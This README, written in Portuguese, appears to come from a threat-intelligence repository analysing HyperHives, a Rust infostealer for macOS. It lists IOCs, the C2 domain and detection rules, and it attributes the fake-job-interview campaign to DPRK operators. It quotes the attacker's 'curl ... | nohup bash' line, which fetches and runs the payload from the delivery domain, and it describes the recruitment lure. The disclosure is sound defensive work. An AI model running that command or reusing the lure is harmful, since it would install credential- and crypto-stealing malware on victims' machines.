
Análise estática completa do infostealer HyperHives macOS Rust — 571 valores de configuração descriptografados, infraestrutura C2, atribuição DPRK/Contagious Interview, regras YARA/Sigma, pacote STIX 2.1, camada ATT&CK Navigator
Inteligência de ameaças: Infostealer binário universal para macOS baseado em Rust, entregue através de um falso processo de entrevista de emprego no Wellfound (antigo AngelList). A persona do operador "Felix" da "HyperHive" atraiu alvos para executar um instalador malicioso de
macos.hyperhives.net. Este repositório documenta a análise estática completa: 571 valores de configuração criptografados recuperados, incluindo URLs de C2, um Sentry DSN e 276 IDs de extensões do Chrome visadas.
| SHA-256 da Amostra | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| Domínio C2 | cloudproxy.link |
| Domínio de Entrega | macos.hyperhives.net |
| Plataforma de Isca | Wellfound (antigo AngelList) |
| Persona do Operador | "Felix" na "HyperHive" |
| VirusTotal | 9 / 63 detecções |
| Classificação | Divulgação pública / pacote IOC |
| Última atualização | Abril de 2026 |
| Arquivo | Formato | Finalidade |
|---|---|---|
iocs.txt | Texto simples | Hashes, domínios, URLs, IPs, e-mail, IDs Sentry — cole em listas de bloqueio, MISP, OpenCTI |
yara_rules.yar | YARA 4.2+ | Correspondência de hash de amostra conhecida + detecções heurísticas de string para Mach-O |
sigma_rules.yml | Sigma | Regras de proxy, DNS e criação de processos — ajuste logsource para seu SIEM |
stix/bundle.json | STIX 2.1 | Pacote CTI legível por máquina com indicadores, SDO de malware, infraestrutura, padrões ATT&CK e relacionamentos |
attack-navigator-layer.json | ATT&CK Navigator | Importe para o ATT&CK Navigator para cobertura visual de técnicas |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
## Início rápido
Coloque a amostra como `sample/installer_binary` (veja [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) para verificação de hash), em seguida:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
O arquivo compose impõe network_mode: none, read_only: true, e elimina todas as capacidades do Linux. Consulte SECURITY.md para diretrizes completas de tratamento.
Uma postagem de emprego no Wellfound (antigo AngelList) levou a uma cadeia de engenharia social de múltiplos e-mails, originada de uma persona operacional "Felix" na "HyperHive". Após elogiar a formação técnica do alvo e agendar uma entrevista falsa, o atacante direcionou a vítima para "revisar o produto" em hyperhives.net e especificamente examinar Settings → Diagnostics → Log — um pretexto para acionar a execução de:```
curl -s https://macos.hyperhives.net/install | nohup bash &
O payload é um **binário universal Mach-O de 8,5 MB** (x86_64 + arm64) compilado em Rust. A análise estática com um laboratório Docker isolado e emulação de CPU de **570 rotinas auxiliares x86_64 únicas** recuperou **todos os 571 valores de configuração criptografados**, expondo:
- **C2:** `cloudproxy.link` — quatro endpoints HTTPS
- **Sentry (pivô de atribuição):** DSN completo com IDs de org/projeto em `ingest.de.sentry.io`
- **Identidade da build:** usuário Cargo `rootr`, codinome `force`, versão `9.12.1`
- **Alvos:** 276 IDs de extensões Chrome (carteiras cripto, gerenciadores de senhas, credenciais corporativas)
As táticas estão alinhadas com campanhas **Contagious Interview vinculadas à RPDC** — recrutamento falso em plataformas legítimas, construção de confiança em várias etapas, entrega `curl | bash`, stealer Rust para macOS e exfiltração focada em criptomoedas.
---
## 1 — Como começou
### A isca: entrevista de emprego falsa no Wellfound